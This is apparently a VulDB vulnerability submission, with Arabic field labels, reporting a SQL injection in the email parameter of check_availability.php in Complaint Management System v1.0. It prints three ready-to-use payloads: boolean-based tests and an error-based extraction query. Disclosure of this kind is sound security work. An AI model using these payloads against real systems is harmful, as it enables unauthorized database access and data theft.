| عنوان | Complaint Management System v1.0 /Complaint Management System/users/check_availability.php POST parameter email exists SQL injection vulnerability |
|---|
| الوصف | An issue was discovered in Complaint Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /Complaint Management System/users/check_availability.php post parameter email.
Payload1:[email protected]' and 'u'='u
Payload2:[email protected]' and 'u'='w
Payload3:[email protected]' and (select 1 from(select count(*),concat(0x51525354,(select (elt(999=999,1))),0x65666768,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'v'='v |
|---|
| المصدر | ⚠️ https://github.com/qinyiqun/bug_report/blob/main/SQLi.md |
|---|
| المستخدم | qinyiqun123 (UID 44722) |
|---|
| ارسال | 11/04/2023 12:14 PM (3 سنوات منذ) |
|---|
| الاعتدال | 11/04/2023 06:32 PM (6 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 225532 [SourceCodester Complaint Management System 1.0 POST Parameter check_availability.php email حقن SQL] |
|---|
| النقاط | 20 |
|---|